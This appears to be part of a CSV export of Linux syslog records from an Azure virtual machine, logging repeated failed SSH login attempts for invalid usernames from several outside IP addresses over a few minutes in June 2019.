+952,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:19:44,UbuntuDevEnv,2019-06-26 18:19:44,auth,UbuntuDevEnv,info,Disconnected from invalid user mama 165.227.41.202 port 50954 [preauth],61991,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mama,165.227.41.2,50954,,
+953,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:19:44,UbuntuDevEnv,2019-06-26 18:19:44,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 50954:11: Bye Bye [preauth],61991,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,50954,,
+954,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:20:30,UbuntuDevEnv,2019-06-26 18:20:30,auth,UbuntuDevEnv,info,Invalid user upload from 157.230.190.1 port 48740,62163,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,upload,157.230.190.1,48740,,
+955,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:20:30,UbuntuDevEnv,2019-06-26 18:20:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,62163,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+956,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:20:30,UbuntuDevEnv,2019-06-26 18:20:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,62163,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+957,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:20:32,UbuntuDevEnv,2019-06-26 18:20:32,auth,UbuntuDevEnv,info,Failed password for invalid user upload from 157.230.190.1 port 48740 ssh2,62163,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,upload,157.230.190.1,48740,,
+958,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:20:32,UbuntuDevEnv,2019-06-26 18:20:32,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 48740:11: Bye Bye [preauth],62163,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,48740,,
+959,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:20:32,UbuntuDevEnv,2019-06-26 18:20:32,auth,UbuntuDevEnv,info,Disconnected from invalid user upload 157.230.190.1 port 48740 [preauth],62163,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,upload,157.230.190.1,48740,,
+960,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:21:05,UbuntuDevEnv,2019-06-26 18:21:04,auth,UbuntuDevEnv,info,Invalid user svn from 107.175.127.237 port 38946,62293,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,svn,107.175.127.2,38946,,
+961,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:21:05,UbuntuDevEnv,2019-06-26 18:21:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,62293,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+962,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:21:05,UbuntuDevEnv,2019-06-26 18:21:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,62293,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+963,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:21:07,UbuntuDevEnv,2019-06-26 18:21:07,auth,UbuntuDevEnv,info,Failed password for invalid user svn from 107.175.127.237 port 38946 ssh2,62293,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,svn,107.175.127.2,38946,,
+964,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:21:07,UbuntuDevEnv,2019-06-26 18:21:07,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 38946:11: Bye Bye [preauth],62293,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,38946,,
+965,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:21:07,UbuntuDevEnv,2019-06-26 18:21:07,auth,UbuntuDevEnv,info,Disconnected from invalid user svn 107.175.127.237 port 38946 [preauth],62293,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,svn,107.175.127.2,38946,,
+966,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:21:42,UbuntuDevEnv,2019-06-26 18:21:41,auth,UbuntuDevEnv,info,Invalid user webadmin from 165.227.41.202 port 42024,62418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webadmin,165.227.41.2,42024,,
+967,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:21:42,UbuntuDevEnv,2019-06-26 18:21:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,62418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+968,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:21:42,UbuntuDevEnv,2019-06-26 18:21:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,62418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+969,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:21:44,UbuntuDevEnv,2019-06-26 18:21:44,auth,UbuntuDevEnv,info,Failed password for invalid user webadmin from 165.227.41.202 port 42024 ssh2,62418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webadmin,165.227.41.2,42024,,
+970,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:21:44,UbuntuDevEnv,2019-06-26 18:21:44,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 42024:11: Bye Bye [preauth],62418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,42024,,
+971,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:21:44,UbuntuDevEnv,2019-06-26 18:21:44,auth,UbuntuDevEnv,info,Disconnected from invalid user webadmin 165.227.41.202 port 42024 [preauth],62418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webadmin,165.227.41.2,42024,,
+972,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:22:15,UbuntuDevEnv,2019-06-26 18:22:15,auth,UbuntuDevEnv,info,Invalid user srvadmin from 157.230.190.1 port 37074,62834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,srvadmin,157.230.190.1,37074,,
+973,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:22:15,UbuntuDevEnv,2019-06-26 18:22:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,62834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+974,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:22:15,UbuntuDevEnv,2019-06-26 18:22:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,62834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+975,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:22:18,UbuntuDevEnv,2019-06-26 18:22:17,auth,UbuntuDevEnv,info,Disconnected from invalid user srvadmin 157.230.190.1 port 37074 [preauth],62834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,srvadmin,157.230.190.1,37074,,
+976,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:22:18,UbuntuDevEnv,2019-06-26 18:22:17,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 37074:11: Bye Bye [preauth],62834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,37074,,
+977,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:22:18,UbuntuDevEnv,2019-06-26 18:22:17,auth,UbuntuDevEnv,info,Failed password for invalid user srvadmin from 157.230.190.1 port 37074 ssh2,62834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,srvadmin,157.230.190.1,37074,,
+978,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:23:24,UbuntuDevEnv,2019-06-26 18:23:23,auth,UbuntuDevEnv,info,Invalid user info from 107.175.127.237 port 56130,63153,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,info,107.175.127.2,56130,,
+979,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:23:24,UbuntuDevEnv,2019-06-26 18:23:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,63153,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+980,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:23:24,UbuntuDevEnv,2019-06-26 18:23:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63153,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+981,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:23:26,UbuntuDevEnv,2019-06-26 18:23:26,auth,UbuntuDevEnv,info,Failed password for invalid user info from 107.175.127.237 port 56130 ssh2,63153,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,info,107.175.127.2,56130,,
+982,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:23:27,UbuntuDevEnv,2019-06-26 18:23:26,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 56130:11: Bye Bye [preauth],63153,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,56130,,
+983,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:23:27,UbuntuDevEnv,2019-06-26 18:23:26,auth,UbuntuDevEnv,info,Disconnected from invalid user info 107.175.127.237 port 56130 [preauth],63153,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,info,107.175.127.2,56130,,
+984,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:23:35,UbuntuDevEnv,2019-06-26 18:23:35,auth,UbuntuDevEnv,info,Invalid user testuser from 165.227.41.202 port 32988,63201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,165.227.41.2,32988,,
+985,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:23:35,UbuntuDevEnv,2019-06-26 18:23:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+986,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:23:35,UbuntuDevEnv,2019-06-26 18:23:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,63201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+987,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:23:38,UbuntuDevEnv,2019-06-26 18:23:37,auth,UbuntuDevEnv,info,Failed password for invalid user testuser from 165.227.41.202 port 32988 ssh2,63201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,165.227.41.2,32988,,
+988,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:23:38,UbuntuDevEnv,2019-06-26 18:23:38,auth,UbuntuDevEnv,info,Disconnected from invalid user testuser 165.227.41.202 port 32988 [preauth],63201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,165.227.41.2,32988,,
+989,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:23:38,UbuntuDevEnv,2019-06-26 18:23:38,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 32988:11: Bye Bye [preauth],63201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,32988,,
+990,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:23:59,UbuntuDevEnv,2019-06-26 18:23:59,auth,UbuntuDevEnv,info,Invalid user nagios from 157.230.190.1 port 53644,63286,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,157.230.190.1,53644,,
+991,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:23:59,UbuntuDevEnv,2019-06-26 18:23:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63286,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+992,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:23:59,UbuntuDevEnv,2019-06-26 18:23:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,63286,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+993,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:24:02,UbuntuDevEnv,2019-06-26 18:24:01,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 157.230.190.1 port 53644 ssh2,63286,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,157.230.190.1,53644,,
+994,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:24:02,UbuntuDevEnv,2019-06-26 18:24:01,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 53644:11: Bye Bye [preauth],63286,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,53644,,
+995,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:24:02,UbuntuDevEnv,2019-06-26 18:24:01,auth,UbuntuDevEnv,info,Disconnected from invalid user nagios 157.230.190.1 port 53644 [preauth],63286,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,157.230.190.1,53644,,
+996,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:24:21,UbuntuDevEnv,2019-06-26 18:24:21,auth,UbuntuDevEnv,info,Invalid user runo from 80.108.220.67 port 59166,63353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,runo,80.108.220.6,59166,,
+997,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:24:21,UbuntuDevEnv,2019-06-26 18:24:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=80.108.220.67,63353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,80.108.220.6,,0,
+998,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:24:21,UbuntuDevEnv,2019-06-26 18:24:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+999,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:24:24,UbuntuDevEnv,2019-06-26 18:24:23,auth,UbuntuDevEnv,info,Failed password for invalid user runo from 80.108.220.67 port 59166 ssh2,63353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,runo,80.108.220.6,59166,,
+1000,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:24:24,UbuntuDevEnv,2019-06-26 18:24:23,auth,UbuntuDevEnv,info,Received disconnect from 80.108.220.67 port 59166:11: Bye Bye [preauth],63353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,80.108.220.6,59166,,
+1001,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:24:24,UbuntuDevEnv,2019-06-26 18:24:23,auth,UbuntuDevEnv,info,Disconnected from invalid user runo 80.108.220.67 port 59166 [preauth],63353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,runo,80.108.220.6,59166,,
+1002,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:25:23,UbuntuDevEnv,2019-06-26 18:25:22,auth,UbuntuDevEnv,info,Invalid user wangyi from 165.227.41.202 port 52044,63584,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wangyi,165.227.41.2,52044,,
+1003,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:25:23,UbuntuDevEnv,2019-06-26 18:25:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63584,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1004,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:25:23,UbuntuDevEnv,2019-06-26 18:25:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,63584,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+1005,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:25:25,UbuntuDevEnv,2019-06-26 18:25:25,auth,UbuntuDevEnv,info,Failed password for invalid user wangyi from 165.227.41.202 port 52044 ssh2,63584,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wangyi,165.227.41.2,52044,,
+1006,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:25:25,UbuntuDevEnv,2019-06-26 18:25:25,auth,UbuntuDevEnv,info,Disconnected from invalid user wangyi 165.227.41.202 port 52044 [preauth],63584,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wangyi,165.227.41.2,52044,,
+1007,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:25:25,UbuntuDevEnv,2019-06-26 18:25:25,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 52044:11: Bye Bye [preauth],63584,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,52044,,
+1008,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:25:36,UbuntuDevEnv,2019-06-26 18:25:35,auth,UbuntuDevEnv,info,Invalid user rou from 107.175.127.237 port 45082,63625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rou,107.175.127.2,45082,,
+1009,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:25:36,UbuntuDevEnv,2019-06-26 18:25:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1010,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:25:36,UbuntuDevEnv,2019-06-26 18:25:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,63625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+1011,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:25:37,UbuntuDevEnv,2019-06-26 18:25:37,auth,UbuntuDevEnv,info,Failed password for invalid user rou from 107.175.127.237 port 45082 ssh2,63625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rou,107.175.127.2,45082,,
